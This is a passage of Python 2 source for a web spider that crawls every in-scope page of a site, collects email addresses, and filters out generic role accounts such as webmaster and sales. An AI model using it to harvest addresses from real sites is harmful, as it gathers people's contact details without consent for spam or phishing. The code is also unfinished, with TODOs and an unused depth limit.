        #check it's an href and that it's within scope
        if  (k == "href" and
            ((("http" in v) and (re.search(self.scope, v))) or
            ("http" not in v)) and
            #skip documents, media, and archives - they can't contain further
            #links and only waste bandwidth
            (not v.lower().endswith((".pdf", ".exe", ".doc", ".docx",
             ".jpg", ".jpeg", ".png", ".css", ".gif", ".mp3", ".mp4",
             ".mov", ".avi", ".flv", ".wmv", ".wav", ".ogg", ".odt",
             ".zip", ".gz", ".bz", ".tar", ".xls", ".xlsx", ".qt",
             ".divx")))):
          #Also todo - modify regex so that >= 3 chars in front >= 7 chars in back
          url = self.urlProcess(v)
          #TODO 10000 is completely arbitrary
          if (url not in self.searchList) and (url != None) and len(self.searchList) < 10000:
            self.searchList.append(url)
  #returns complete url in the form http://stuff/bleh
  #as input handles (./url, http://stuff/bleh/url, //stuff/bleh/url)
  def urlProcess(self, link):
    link = link.strip()
    if "http" in link:
      return (link)
    elif link.startswith("//"):
      return self.proto + "://" + link[2:]
    elif link.startswith("/"):
      return self.proto + "://" + self.baseurl + link
    elif link.startswith("#"):
      return None
    elif ":" not in link and " " not in link:
      while link.startswith("../"):
        link = link[3:]
        #TODO [8:-1] is just a heuristic, but too many misses shouldn't be bad... maybe?
        if self.url.endswith("/") and ("/" in self.url[8:-1]):
          self.url = self.url[:self.url.rfind("/", 0, -1)] + "/"
      dir = self.url[:self.url.rfind("/")] + "/"
      return dir + link
    return None

class SiteSpider:
  def __init__(self, searchList, scope=None, verbocity=True, maxDepth=4):
    #TODO maxDepth logic
    #necessary to add to this list to avoid infinite loops
    self.searchList = searchList
    self.emailList = []
    self.errors = {"decoding":0, "link":0, "parse":0, "connection":0, "unknown":0}
    if scope == None:
      try:
        urlre = re.search(r"(\w+):[/]+([^/]+).*", self.searchList[0])
        self.scope = urlre.group(2)
      except AttributeError:
        raise Exception("URLFormat", "URL passed is invalid")
    else:
      self.scope = scope
    index = 0
    threshhold = 0
    while 1:
      try:
        PageSpider(self.searchList[index], self.scope, self.searchList, self.emailList, self.errors)
        if verbocity:
          print self.searchList[index]
          print " Total Emails:", len(self.emailList)
          print " Pages Processed:", index
          print " Pages Found:", len(self.searchList)
        index += 1
      except IndexError:
        break
      except KeyboardInterrupt:
        break
      except:
        threshhold += 1
        print "Warning: unknown error"
        self.errors["unknown"] += 1
        if threshhold >= 40:
          break
        pass
    garbageEmails =   [ "help",
                        "webmaster",
                        "contact",
                        "sales" ]
    print "REPORT"
    print "----------"
    for email in self.emailList:
      if email.split("@")[0].lower() not in garbageEmails:
        print email
    print "\nTotal Emails:", len(self.emailList)
    print "Pages Processed:", index
    print "Errors:", self.errors

if __name__ == "__main__":
  SiteSpider(sys.argv[1].split(","))